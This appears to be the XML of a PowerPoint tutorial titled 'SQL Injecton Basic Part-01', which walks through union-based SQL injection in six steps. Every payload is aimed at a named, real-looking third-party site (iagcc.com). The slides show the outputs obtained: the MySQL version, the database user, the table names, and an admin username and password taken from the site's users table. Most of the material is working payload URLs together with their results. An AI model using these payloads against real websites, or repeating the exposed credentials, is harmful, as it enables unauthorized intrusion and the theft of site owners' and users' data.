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D0D9BF88-7C37-4EF3-8E34-29BDAFC54E7D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0FD61BD-D81B-4B4A-A35F-CBEB1D137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77160"/>
            <a:ext cx="809336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D5D53570-AF34-4645-9188-11522E8A0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965" y="128469"/>
            <a:ext cx="8246070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965" y="128470"/>
            <a:ext cx="8246071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8A34A6-61D1-4394-82E5-9AC8EA81C5E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agcc.com/news.php?id=-58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riagepaper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Injecton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Basic Part-01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Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>04: Vulnerable column finding using (union select statement)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http://iagcc.com/news.php?id=58 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>union select 1,2,3,4,5,6-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>To make the vulnerable column visible use false condition like (and false, and 0=1) or (before id . , -) etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>iagcc.com/news.php?id=58 and false union </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>select 1,2,3,4,5,6-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Define the vulnerable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7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Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>05: Retrieve basic information's like version, user, database using (@@version ,  version(), user(), database())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http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>://iagcc.com/news.php?id=-58 UNION SELECT 1,2,3,4,5,version() -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>5.6.39-cll-lve</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>http://iagcc.com/news.php?id=-58 UNION SELECT 1,2,3,4,5,user() -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>icc_champ@localhost</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>http://iagcc.com/news.php?id=-58 UNION SELECT 1,2,3,4,5,user() -- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iagcc_central</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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3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Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>06: Getting table, column and other row information's.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http://iagcc.com/news.php?id=-58 union select 1,2,3,table_name,5,6 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>=database()-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Page </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>(table name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://iagcc.com/news.php?id=-58</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t> union </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>select 1,2,3,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>),5,6 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>=database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>()– </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>For getting all the table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://iagcc.com/news.php?id=-58</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t> union select 1,2,3,group_concat(table_name,0x3c62723e),5,6 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>=database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>()-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://iagcc.com/news.php?id=-58</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t> union select 1,2,3,group_concat(column_name,0x3c62723e),5,6 from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>='users'-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>-(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>UserId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,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>UserName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> ,Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>http://iagcc.com/news.php?id=-58 union select 1,2,3,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" err="1"/>
              <a:t>UserId,UserName</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>,Password,0x3c62723e),5,6 from users-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(1adminTSphIWx1QDUla0BwIUw=)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>1, admin, M*a!lu@5%k@p!L</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty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US" sz="1800" b="1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4776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to reveal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www.marriagepaper.com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Structured Query Language Injection (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) Vulnerability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conduct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is the process to retrieve data form a database using SQL queries.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113635"/>
            <a:ext cx="5802790" cy="25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 based- Injectors are allowed to dump all the data using a single query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Error based- Get privilege to retrieve only a few information's using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>query 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injection- Injectors get only one information at a time using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> quires.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SQLi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conduct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SQLi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Step 01: Find a SQL vulnerable and injectable parameter using (‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> “ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> /)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Step 02: Query fixing using (-- , -- - , --+- , --+ , %23 , %60 , /*)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Step 03: Column count using (order by , group by)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Step 04: Vulnerable column finding using (union select statement)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Step 05: Retrieve basic information's like version, user, database using (@@version ,  version(), user(), database())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Step 06: Getting table, column and other row information's.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28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Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>01: Find a SQL vulnerable and injectable parameter using (‘ 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r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> “ 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r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> /)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Web link: http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>iagcc.com/news.php?id=58 (page is loading normally)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>iagcc.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>news.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>=58’ (Showing error message)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Could not get data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY id DESC' at line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3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Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>02: Query fixing using (-- , -- - , --+- , --+ , %23 , %60 , /*)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http://iagcc.com/news.php?id=58-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Reload the web page and check that the web site is loading normally/not.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947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Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>03: Column count using (order by , group by)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http://iagcc.com/news.php?id=58 order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>1-- -(no error)…….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>http://iagcc.com/news.php?id=58 order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>6-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>-(no error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>http://iagcc.com/news.php?id=58 order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>7-- -(error)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>As, we got not error from number 1 to 6 but got error in 7 . So the number of column is  6</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800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500</Words>
  <Application>Microsoft Office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Dubai</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>SQL Injecton Basic Part-01 </vt:lpstr>
      <vt:lpstr>Structured Query Language Injection (SQLi) Vulnerability</vt:lpstr>
      <vt:lpstr>What is SQLi?</vt:lpstr>
      <vt:lpstr>Types of SQLi?</vt:lpstr>
      <vt:lpstr>Why SQLi?</vt:lpstr>
      <vt:lpstr>How to conduct SQLi?</vt:lpstr>
      <vt:lpstr> Step 01: Find a SQL vulnerable and injectable parameter using (‘ , “ , /) </vt:lpstr>
      <vt:lpstr> Step 02: Query fixing using (-- , -- - , --+- , --+ , %23 , %60 , /*) </vt:lpstr>
      <vt:lpstr>  Step 03: Column count using (order by , group by) </vt:lpstr>
      <vt:lpstr>  Step 04: Vulnerable column finding using (union select statement) </vt:lpstr>
      <vt:lpstr> Step 05: Retrieve basic information's like version, user, database using (@@version ,  version(), user(), database()) </vt:lpstr>
      <vt:lpstr> Step 06: Getting table, column and other row information's.  </vt:lpstr>
      <vt:lpstr>Time to reveal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154</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-08-21T19:17:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-15T15:23:54Z</dcterms:modified>
</cp:coreProperties>
</file>